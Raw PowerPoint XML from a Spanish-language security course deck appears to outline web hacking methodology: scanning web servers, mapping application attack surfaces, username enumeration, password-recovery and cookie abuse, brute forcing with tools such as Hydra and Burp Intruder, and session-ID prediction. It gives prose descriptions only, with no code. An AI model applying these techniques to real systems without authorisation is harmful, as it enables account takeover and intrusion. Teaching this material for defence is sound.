              <a:t>Pila </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>1. Seguridad. IPS IDS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1922362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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> Web Servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Luego de identificar el ambiente del servidor web, escanear las vulnerabilidades conocidas en el servidor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>utilizando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>escaneador</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>vulnerabilidades. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Realizar un ataque para explotar las </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>vulnerabilidades </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>identificadas. Lanzar un ataque </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>. Herramientas: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>UrlScan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Nikto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>WWWhack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Acunetix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>WebInspect</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6541734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3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Analize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Applications</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Para identificar las superficies de ataque que la expone.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Identify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Entry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Points</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>: Revisar la solicitud HTTP generada para identificar puntos de entrada del usuario. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t> proxy, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>HttPrint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>WebSarab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>, Paros Proxy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Identify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Server-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Functionality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>: Observar las aplicaciones reveladas en el cliente para identificar la estructura y funcionalidad de lado del servidor. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Teleport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t> Pro, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>BlackWidow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="3000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2544694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3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Analize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Applications</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Identify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Server-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> Technologies: Hacer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>fingerprint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> las tecnologías activas en el servidor utilizando varias técnicas como HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>fingerprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Surface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>: Identificar varias superficies de ataque descubiertas por las aplicaciones y las vulnerabilidades asociadas con cada una.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26493632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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Mechanism</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Los atacantes pueden diseñar el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> y las fallas de implementación en las aplicaciones Web, tales como la insuficiencia de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>fortalece </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>de la contraseña o transporte inseguro de las credenciales, para saltar mecanismos de autenticación. </a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Enumeración </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>de nombre de usuario: Si el estado de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> muestra qué parte, si el nombre de usuario o contraseña no es correcta, se puede adivinar los usuarios de la aplicación utilizando el método trial-and-error.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38085933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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Mechanism</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>- Ataques de contraseña: Cambiando contraseñas. Determinar la funcionalidad de cambio de contraseña dentro de la aplicación haciendo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>spidering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> en la aplicación o creando una cuenta de inicio de sesión. Analizando las cadenas "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>old</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>", "new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>confirm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>" luego analizarlos en búsqueda de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>vulnerabilidades</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" i="1" dirty="0" smtClean="0"/>
              <a:t> (continua)</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25478539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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Mechanism</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500" dirty="0"/>
              <a:t>Recuperación de contraseña, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>forgot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>" generalmente presentan un reto para los usuarios, si el número de intentos no está limitado, el atacante puede adivinar la pregunta reto. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>remember</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t> me", son implementadas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0" smtClean="0"/>
              <a:t>utilizando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>una cookie persistente como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>RememberUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>jason</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t> o identificador de sesión persistente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>RememberUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>=ABY112010. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>Lista de contraseñas, diccionario de contraseñas, o herramientas como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>WebCracker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>brutus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>Insider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>, THC-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>Hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>Fuerza bruta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>Suite's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>Intruder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>Brutus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t> y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>Sensepost's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>Crowbar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2500" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3473033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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Mechanism</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Ataques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>de sesión: En el primer paso, el atacante recolecta algún valor de ID de sesión </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>olfateando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>el tráfico desde usuarios autenticados. Los atacantes luego analizan los </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>IDs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> de sesión para determinar la generación de procesos de generación de ID como la estructura de la ID de sesión, la información que es utilizada para crearla, y luego el algoritmo de encriptación o hash que es </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>utilizado </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>crearlos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" i="1" dirty="0"/>
              <a:t> (continua)</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1382422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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Mechanism</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dirty="0"/>
              <a:t>El atacante puede implementar una técnica de fuerza  bruta para generar y probar distintos valores de ID de sesión hasta que puede obtener acceso a la aplicación. Los mecanismos de generación de sesión vulnerable que utiliza ID de sesión compuesto por un nombre de usuario y otra información predecible como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>timestamp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>dirección </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>IP de cliente puede ser explotado fácilmente adivinando la ID de sesión.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30854990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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Mechanism</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
